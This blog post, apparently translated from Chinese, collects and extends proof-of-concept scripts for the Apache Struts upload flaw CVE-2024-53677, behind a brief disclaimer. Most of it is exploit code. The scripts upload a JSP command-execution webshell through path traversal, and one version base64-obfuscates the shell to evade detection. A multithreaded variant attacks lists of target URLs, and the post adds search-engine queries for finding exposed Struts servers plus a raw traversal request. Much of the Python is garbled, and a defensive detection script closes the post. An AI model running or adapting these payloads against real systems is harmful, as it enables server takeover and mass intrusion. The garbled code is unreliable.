Preface

This post summarizes the currently available PoCs for the Apache Struts RCE (CVE-2024-53677). Because they can only verify a single IP at a time, I modified the code so that it reads URLs from a file, verifies them with multiple threads and saves the results, and I changed the explanations to Chinese.

Disclaimer

Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses caused by spreading or using the information or tools provided here are the sole responsibility of the user, and the author bears no responsibility for any adverse outcome. This article is for learning purposes only.

Python implementation

Reference PoC: https://github.com/TAM-K592/CVE-2024-53677-S2-067/

The following Apache Struts versions are affected: 2.0.0 to 2.5.33 and 6.0.0 to 6.3.0.2.

Judging by the PoC repository's history over the past few days, the latest version currently online is the base64-obfuscated one, which came out yesterday at noon (2024.12.18): https://github.com/TAM-K592/CVE-2024-53677-S2-067/

I made some changes on top of that author's work: the script is now multithreaded, and the explanations are in Chinese.

```
usage: CVE-2024-53677-S2-067-thread.py [-h] (-u URL | -f FILE) --upload_endpoint UPLOAD_ENDPOINT [--paths PATHS [PATHS ...]]
                                       [--filenames FILENAMES [FILENAMES ...]] [--payload PAYLOAD] [-s THREADS] [-o OUTPUT]

S2-067 Exploit - 多线程文件上传支持并从文件中读取URL

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     目标基础URL例如http://example.com
  -f FILE, --file FILE  包含目标基础URL的文件路径每行一个URL
  --upload_endpoint UPLOAD_ENDPOINT
                        上传端点路径例如/uploads.action
  --paths PATHS [PATHS ...]
                        路径遍历测试路径
  --filenames FILENAMES [FILENAMES ...]
                        自定义载荷文件名
  --payload PAYLOAD     自定义JSP载荷内容
  -s THREADS, --threads THREADS
                        使用的线程数量默认: 5
  -o OUTPUT, --output OUTPUT
                        输出成功URL的文件路径默认success.txt
```

Repository: https://github.com/dustblessnotdust/CVE-2024-53677-S2-067-thread

The source code is below.

Check whether the file upload succeeds, without executing commands

```python
import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random

# Configure logging
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s",
    handlers=[logging.StreamHandler()]
)

def detect_vulnerability(target_url, upload_endpoint):
    """Non-destructive detection of CVE-2024-53677."""
    logging.info("Starting detection for CVE-2024-53677 (S2-067)...")
    upload_url = urljoin(target_url, upload_endpoint)
    test_filename = "../../vuln_test.txt"
    harmless_content = "S2-067 detection test."

    # Attempt to overwrite file name using OGNL binding
    files = {
        "upload": ("test.txt", harmless_content, "text/plain"),
        "top.uploadFileName": test_filename  # Attempt filename overwrite
    }

    # Custom Content-Type boundary
    boundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))
    m = MultipartEncoder(fields=files, boundary=boundary)
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": m.content_type
    }
    logging.info(f"Sending test request to upload endpoint: {upload_url}")
    try:
        # Send file upload request
        response = requests.post(upload_url, headers=headers, data=m, timeout=10)
        # Analyze HTTP response
        if response.status_code == 200:
            logging.info("[INFO] File upload request succeeded.")
            if "vuln_test.txt" in response.text:
                logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")
            else:
                logging.info("[INFO] Target does not appear vulnerable.")
        elif response.status_code in [403, 401]:
            logging.info("[INFO] Access denied. Ensure proper permissions.")
        else:
            logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        logging.error(f"[ERROR] Request failed: {e}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-53677 (S2-067) Non-destructive Detection Tool")
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")
    parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")
    args = parser.parse_args()
    logging.info("Starting detection process...")
    detect_vulnerability(args.url, args.upload_endpoint)
    logging.info("Detection process completed.")

if __name__ == "__main__":
    main()
```

Without base64 obfuscation

import requests import argparse from urllib.parse import urljoin from requests_toolbelt.multipart.encoder import MultipartEncoder import random import stringdef generate_random_filename(extension.jsp, length8):Generate a random filename.return .join(random.choices(string.ascii_letters string.digits, klength)) extensiondef create_payload():Generate a simple JSP payload for testing RCE.return % page importjava.io.* % %String cmd request.getParameter(cmd);if (cmd ! null) {Process p Runtime.getRuntime().exec(cmd);BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream()));String line;while ((line in.readLine()) ! 
null) {out.println(line);}} %def upload_multiple_files(target_url, upload_endpoint, payload, paths, filenames):Upload multiple payload files using parameter overwrite and path traversal.upload_url urljoin(target_url, upload_endpoint)print(f[INFO] Target upload endpoint: {upload_url})headers {User-Agent: Mozilla/5.0}boundary ----WebKitFormBoundary .join(random.choices(string.ascii_letters string.digits, k16))for path in paths:files_payload {}print(f\n[INFO] Testing path traversal with base path: {path})for index, filename in enumerate(filenames):modified_filename f{path}/{filename}key_file fupload[{index}]key_name fuploadFileName[{index}]files_payload[key_file] (filename, payload, application/octet-stream)files_payload[key_name] modified_filenameprint(f[INFO] File {index 1}: {modified_filename})m MultipartEncoder(fieldsfiles_payload, boundaryboundary)headers[Content-Type] m.content_typetry:response requests.post(upload_url, headersheaders, datam, timeout10)if response.status_code 200:print([SUCCESS] Payload uploaded. Verifying...)for filename in filenames:verify_uploaded_file(target_url, f{path}/{filename})else:print(f[ERROR] Upload failed. HTTP {response.status_code})except requests.RequestException as e:print(f[ERROR] Request failed: {e})def verify_uploaded_file(target_url, file_path):Verify if the uploaded payload file is accessible and can execute commands.file_url urljoin(target_url, file_path)print(f[INFO] Verifying uploaded file: {file_url})try:response requests.get(file_url, timeout10)if response.status_code 200:print(f[ALERT] File uploaded and accessible: {file_url}?cmdwhoami)else:print(f[INFO] File not accessible. 
HTTP Status: {response.status_code})except requests.RequestException as e:print(f[ERROR] Verification failed: {e})def main():parser argparse.ArgumentParser(descriptionS2-067 Exploit - Multi-file Upload Support)parser.add_argument(-u, --url, requiredTrue, helpTarget base URL (e.g., http://example.com))parser.add_argument(--upload_endpoint, requiredTrue, helpPath to upload endpoint (e.g., /uploads.action))parser.add_argument(--paths, nargs, default[../../../../../webapps/ROOT, /tmp],helpPaths for path traversal testing)parser.add_argument(--filenames, nargs,helpCustom filenames for payloads,default[generate_random_filename() for _ in range(3)])parser.add_argument(--payload, helpCustom JSP payload content, defaultcreate_payload())args parser.parse_args()print([INFO] Starting S2-067 Multi-file Upload Exploit...)upload_multiple_files(args.url.rstrip(/), args.upload_endpoint, args.payload, args.paths, args.filenames)print(\n[INFO] Exploit process completed.)if __name__ __main__:main()进行了base64混淆 import requests import argparse import base64 import random import string from urllib.parse import urljoin from requests_toolbelt.multipart.encoder import MultipartEncoderdef generate_random_filename(extension.jsp, length8):Generate a random filename.return .join(random.choices(string.ascii_letters string.digits, klength)) extensiondef create_obfuscated_payload():Generate an obfuscated JSP payload for testing RCE.Avoid direct detection by encoding and decoding commands dynamically.payload_base64 base64.b64encode( % page importjava.io.* % %String cmd request.getParameter(cmd);if (cmd ! null) {Process p Runtime.getRuntime().exec(cmd);BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream()));StringBuilder output new StringBuilder();String line;while ((line in.readLine()) ! 
null) {output.append(line).append(\\n);}out.println(output.toString());} % .strip().encode()).decode()jsp_payload f% page importjava.util.Base64, java.nio.charset.StandardCharsets % %String encodedPayload {payload_base64};byte[] decodedBytes Base64.getDecoder().decode(encodedPayload);String decoded new String(decodedBytes, StandardCharsets.UTF_8);out.println(decoded);// Execute dynamically decoded payloadrequest.getRequestDispatcher(temp.jsp).include(request, response); %return jsp_payloaddef upload_multiple_files(target_url, upload_endpoint, payload, paths, filenames):Upload multiple payload files using parameter overwrite and path traversal.upload_url urljoin(target_url, upload_endpoint)print(f[INFO] Target upload endpoint: {upload_url})headers {User-Agent: Mozilla/5.0}boundary ----WebKitFormBoundary .join(random.choices(string.ascii_letters string.digits, k16))for path in paths:files_payload {}print(f\n[INFO] Testing path traversal with base path: {path})for index, filename in enumerate(filenames):modified_filename f{path}/{filename}key_file fupload[{index}]key_name fuploadFileName[{index}]files_payload[key_file] (filename, payload, application/octet-stream)files_payload[key_name] modified_filenameprint(f[INFO] File {index 1}: {modified_filename})m MultipartEncoder(fieldsfiles_payload, boundaryboundary)headers[Content-Type] m.content_typetry:response requests.post(upload_url, headersheaders, datam, timeout10)if response.status_code 200:print([SUCCESS] Payload uploaded. Verifying...)for filename in filenames:verify_uploaded_file(target_url, f{path}/{filename})else:print(f[ERROR] Upload failed. 
HTTP {response.status_code})except requests.RequestException as e:print(f[ERROR] Request failed: {e})def verify_uploaded_file(target_url, file_path):Verify if the uploaded payload file is accessible.file_url urljoin(target_url, file_path)print(f[INFO] Verifying uploaded file: {file_url})try:response requests.get(file_url, timeout10)if response.status_code 200:print(f[ALERT] File uploaded and accessible: {file_url}?cmdwhoami)else:print(f[INFO] File not accessible. HTTP Status: {response.status_code})except requests.RequestException as e:print(f[ERROR] Verification failed: {e})def main():parser argparse.ArgumentParser(descriptionS2-067 Exploit - Multi-file Upload Support)parser.add_argument(-u, --url, requiredTrue, helpTarget base URL (e.g., http://example.com))parser.add_argument(--upload_endpoint, requiredTrue, helpPath to upload endpoint (e.g., /uploads.action))parser.add_argument(--paths, nargs, default[../../../../../webapps/ROOT, /tmp],helpPaths for path traversal testing)parser.add_argument(--filenames, nargs,helpCustom filenames for payloads,default[generate_random_filename() for _ in range(3)])parser.add_argument(--payload, helpCustom JSP payload content, defaultcreate_obfuscated_payload())args parser.parse_args()print([INFO] Starting S2-067 Multi-file Upload Exploit...)upload_multiple_files(args.url.rstrip(/), args.upload_endpoint, args.payload, args.paths, args.filenames)print(\n[INFO] Exploit process completed.)if __name__ __main__:main()多线程中文 使用截图 代码部分 import requests import argparse import base64 import random import string from urllib.parse import urljoin from requests_toolbelt.multipart.encoder import MultipartEncoder from concurrent.futures import ThreadPoolExecutor def generate_random_filename(extension.jsp, length8): 生成随机文件名。 return .join(random.choices(string.ascii_letters string.digits, klength)) extension def create_obfuscated_payload(): 生成一个用于测试RCE的混淆JSP载荷。 通过动态编码和解码命令以避免直接检测。 payload_base64 base64.b64encode( % page importjava.io.* % % String 
cmd request.getParameter(cmd); if (cmd ! null) { Process p Runtime.getRuntime().exec(cmd); BufferedReader in new BufferedReader(new InputStreamReader(p.getInputStream())); StringBuilder output new StringBuilder(); String line; while ((line in.readLine()) ! null) { output.append(line).append(\\n); } out.println(output.toString()); }% .strip().encode()).decode() jsp_payload f% page importjava.util.Base64, java.nio.charset.StandardCharsets % % String encodedPayload {payload_base64}; byte[] decodedBytes Base64.getDecoder().decode(encodedPayload); String decoded new String(decodedBytes, StandardCharsets.UTF_8); out.println(decoded); // 动态执行解码后的载荷 request.getRequestDispatcher(temp.jsp).include(request, response);% return jsp_payload def upload_and_verify_file(upload_url, headers, files_payload, path, filename): m MultipartEncoder(fieldsfiles_payload, boundary----WebKitFormBoundary .join(random.choices(string.ascii_letters string.digits, k16))) headers[Content-Type] m.content_type try: response requests.post(upload_url, headersheaders, datam, timeout10) if response.status_code 200: print([成功] 载荷上传成功。正在验证...) 
verify_uploaded_file(upload_url.split(/uploads)[0], f{path}/{filename}) else: print(f[错误] 上传失败。HTTP 状态码 {response.status_code} 文件 {filename}) except requests.RequestException as e: print(f[错误] 请求失败: {e}) def verify_uploaded_file(target_url, file_path): 验证上传的载荷文件是否可访问。 file_url urljoin(target_url, file_path) print(f[信息] 正在验证上传文件: {file_url}) try: response requests.get(file_url, timeout10) if response.status_code 200: print(f[警告] 文件上传并可访问: {file_url}?cmdwhoami) else: print(f[信息] 文件不可访问。HTTP 状态码: {response.status_code} 文件 {file_path}) except requests.RequestException as e: print(f[错误] 验证失败: {e}) def read_urls_from_file(file_path): 从文件中读取URL每行一个。 urls [] try: with open(file_path, r) as file: for line in file: url line.strip() if url: urls.append(url) except FileNotFoundError: print(f[错误] 文件未找到: {file_path}) except Exception as e: print(f[错误] 读取文件时出错: {e}) return urls def main(): parser argparse.ArgumentParser(descriptionS2-067 Exploit - 多线程文件上传支持并从文件中读取URL) group parser.add_mutually_exclusive_group(requiredTrue) group.add_argument(-u, --url, help目标基础URL例如http://example.com) group.add_argument(-f, --file, help包含目标基础URL的文件路径每行一个URL) parser.add_argument(--upload_endpoint, requiredTrue, help上传端点路径例如/uploads.action) parser.add_argument(--paths, nargs, default[../../../../../webapps/ROOT, /tmp], help路径遍历测试路径) parser.add_argument(--filenames, nargs, help自定义载荷文件名, default[generate_random_filename() for _ in range(3)]) parser.add_argument(--payload, help自定义JSP载荷内容, defaultcreate_obfuscated_payload()) parser.add_argument(-s, --threads, typeint, default5, help使用的线程数量默认: 5) args parser.parse_args() headers {User-Agent: Mozilla/5.0} if args.file: urls read_urls_from_file(args.file) if not urls: print([错误] 指定文件中没有有效的URL。) return else: urls [args.url.rstrip(/)] for target_url in urls: print(f\n[信息] 正在处理目标URL: {target_url}) upload_url urljoin(target_url, args.upload_endpoint) with ThreadPoolExecutor(max_workersargs.threads) as executor: futures [] for path in args.paths: files_payload 
{} print(f\n[信息] 使用基路径进行路径遍历测试: {path}) for index, filename in enumerate(args.filenames): modified_filename f{path}/{filename} key_file fupload[{index}] key_name fuploadFileName[{index}] files_payload[key_file] (filename, args.payload, application/octet-stream) files_payload[key_name] modified_filename print(f[信息] 文件 {index 1}: {modified_filename}) future executor.submit(upload_and_verify_file, upload_url, headers.copy(), files_payload, path, filename) futures.append(future) for future in futures: future.result() print(\n[信息] 攻击过程完成。) if __name__ __main__: main()

Vulnerability PoC

If you do not want to use Python and only want to verify whether the vulnerability exists, you can use Burp Suite or Yakit.

Fofa syntax: app="Struts2"

Quake syntax: app:"Apache Struts2"

PoC

```http
POST /upload HTTP/1.1
Host: {{file:line(C:\Users\lenovo\Desktop\漏洞挖掘\数据处理\output_1.txt)}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Content-Length: 220
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXToNPRY2YGK82Cfc
Upgrade-Insecure-Requests: 1

------WebKitFormBoundaryXToNPRY2YGK82Cfc
Content-Disposition: form-data; name="file"; filename="../../../../../../../etc/passwd"
Content-Type: application/octet-stream

1
------WebKitFormBoundaryXToNPRY2YGK82Cfc--
```
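The defender-side counterpart to the requests above, as an added example that is not part of the original post or of either PoC repository: it parses a multipart/form-data body (for instance from a proxy or WAF capture) and flags form fields that set the upload file name separately from the file, as well as traversal sequences in a part's own filename. The function names, regular expressions and sample bodies are constructed for illustration.

```python
import re
from email.parser import BytesParser

# Field names that bind to the action's file-name property, as seen in the
# scripts on this page: "top.uploadFileName", "uploadFileName[0]".
NAME_BINDING = re.compile(r"(?:^|\.)\w*FileName(?:\[\d+\])?$", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\.[\\/]")

def inspect_upload(content_type, body):
    """Return a list of findings for one multipart/form-data request body."""
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = BytesParser().parsebytes(raw)
    if not msg.is_multipart():
        return []
    findings = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition") or ""
        filename = part.get_filename()
        if filename is not None:
            # File part: the client-supplied filename itself carries traversal.
            if TRAVERSAL.search(filename):
                findings.append(f"traversal in filename of part {name!r}")
        elif NAME_BINDING.search(name):
            # Plain field that sets the stored file name separately from the file.
            value = part.get_payload(decode=True).decode("utf-8", "replace").strip()
            kind = "traversal" if TRAVERSAL.search(value) else "override"
            findings.append(f"{kind} via field {name!r}: {value!r}")
    return findings

def build_body(boundary, parts):
    """Build a constructed sample body from (name, filename or None, content)."""
    out = []
    for name, filename, content in parts:
        disp = f'form-data; name="{name}"'
        if filename is not None:
            disp += f'; filename="{filename}"'
        out.append(f"--{boundary}\r\nContent-Disposition: {disp}\r\n\r\n{content}\r\n")
    return ("".join(out) + f"--{boundary}--\r\n").encode()

# Constructed sample requests (not captured traffic).
BOUNDARY = "----SampleBoundary0001"
CTYPE = f"multipart/form-data; boundary={BOUNDARY}"
BENIGN = build_body(BOUNDARY, [("upload", "report.txt", "hello"), ("note", None, "q3")])
OVERRIDE = build_body(BOUNDARY, [("upload", "test.txt", "x"),
                                 ("top.uploadFileName", None, "../../vuln_test.txt")])
BAD_NAME = build_body(BOUNDARY, [("file", "../../../etc/passwd", "1")])

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("override", OVERRIDE), ("bad name", BAD_NAME)):
        print(label, inspect_upload(CTYPE, body))
```

A legitimate client has no reason to send a file-name field alongside the file part, so even the plain "override" finding is worth alerting on for Struts upload endpoints.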